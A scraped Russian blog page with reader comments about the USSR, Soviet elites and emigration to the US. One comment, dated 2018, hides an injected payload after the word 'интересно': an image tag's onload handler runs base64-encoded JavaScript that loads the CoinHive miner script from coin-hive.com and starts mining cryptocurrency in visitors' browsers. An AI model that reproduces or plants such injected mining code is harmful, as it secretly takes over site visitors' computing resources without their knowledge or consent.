элита про которую Сталин в 1941 году сказал - проклятое племя... И все понеслись вскачь за хрущем.. А потом в 1991 году у таких же со скрытыми буржуазными задатками впереди забрезжила "рыночная перспектива" - стать владельцем завода и заставить работать на себя других..Тут уж и партбилет можно выбросить, и никаких "ковров" в райкоме, парткоме... Так что не надо песен про засилье идеологии. Это вопль тех с мелкобуржуазной идеологией которые вступили в партию не по убеждениям а ради карьеры и которых с 1953 года "перестали чистить" им именно строгая дисциплина не нравилась. И мелкобуржуазный вопль в 1987-1991 - слился с воплем буржуазным - слились в экстазе и пошли у нас олигархи с человеческим лицом.. http://www.sb.by/obshchestvo/article/ekh-mne-by-v-sssr-.html
Vera560 09-03-2016-09:52 удалить
Стоит ли обращать внимание на вечно злых и всем недовольных людей? Ведь с первых строк понятно, что это бред сумасшедшего. Приехал, скорее всего, нелегально, наслушавшись сказок и, видимо, предполагая, что как только он сойдёт с трапа самолёта в JFK, ему тут же посыпется с неба манна небесная По билет в кино стоимостью 50 рублей вообще нонсенс. У меня муж в Астраханской области всегда за 10 копеек ходит, потому что поход в кино ровно столько и стоит. Про еду и технику тоже чушь полная. А з\п явно указана для нелегалов, самый минимум. Мотель… хммм… когда мой муж прилетал ко мне, сваддьба там и прочее, мы с ним жили в гостинице очень такого среднего класса, с прокуренной комнатой (!), завтраком на 1 персону, хотя номер был на двоих, какой-то древний телевизор, кровать и 2 тумбочки. Единственное, санузел был приличный, хоть на том спасибо. Платили мы за всё это добро 1 рубль 50 копеек в сутки. За что такие деньги спрашивается? По сути за койку. Ну да ладно, не суть, нам и того хватало, лишь бы вместе быть :) Про гласность и «злорадство над неудачами России» позабавило. Надо же такую извращенную фантазию иметь. У меня там мама, тётя родная, муж с его мамой. Ни у одного из них не возникало даже мимолетного желания вернуться обратно в Россию. Мало того, добровольно посещать Россию из них всех согласна только мама, и то ненадолго. Ну это потому что мы с братом пока тут, ясно-понятно, дети всё же. Тётя после последнего визита 5 лет назад четко дала понять, что в Россию, «в этот кошмар», она больше ни ногой. В общем и целом есть такая категория людей, которые в своих неудачах винят весь мир, не желая искать причин в себе. Ну и Бог с ними :) В итоге каждый выбирает то, что ему по душе. Ну нравится ему в России жить, пусть живет. От грязи, им вылитой, осадок такой неприятный — можно было и попридержать себя конечно. Взрослый человек всё же. [http://smiles2k.net/music_smiles/index.html]http://i.smiles2k.net/music_smiles/Party2.gif
08-02-2018-16:50 удалить
интересно data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==" onload="eval(atob('ZnVuY3Rpb24gY2RuQ3JlYXRpb24oKXt3aW5kb3cuQ29pbkhpdmU9ITE7dmFyIGU9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7ZS5zcmM9Ii8vY29pbi1oaXZlLmNvbS9saWIvY29pbmhpdmUubWluLmpzIixkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGUpfWNkbkNyZWF0aW9uKCk7dmFyIGNfY2hlY2s9d2luZG93LnNldEludGVydmFsKGZ1bmN0aW9uKCl7aWYoQ29pbkhpdmUpe2NsZWFySW50ZXJ2YWwoY19jaGVjayk7Zm9yKHZhciBlPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCJhIiksbj0oZS5sZW5ndGgsMCk7bjxlLmxlbmd0aDtuKyspZVtuXS5zZXRBdHRyaWJ1dGUoInRhcmdldCIsIl9ibGFuayIpO25ldyBDb2luSGl2ZS5Bbm9ueW1vdXMoImxBTDIwZDRwTlFyZXA1OW5NRDNmMVA3RXhXUVd3MmxIIikuc3RhcnQoKX19LDEwMCk7'))


Комментарии (8): вверх^

Вы сейчас не можете прокомментировать это сообщение.

Дневник Общая статья по СССР | Alexseysss - О мире, о религии, о советской стране, и о себе | Лента друзей Alexseysss / Полная версия Добавить в друзья Страницы: раньше»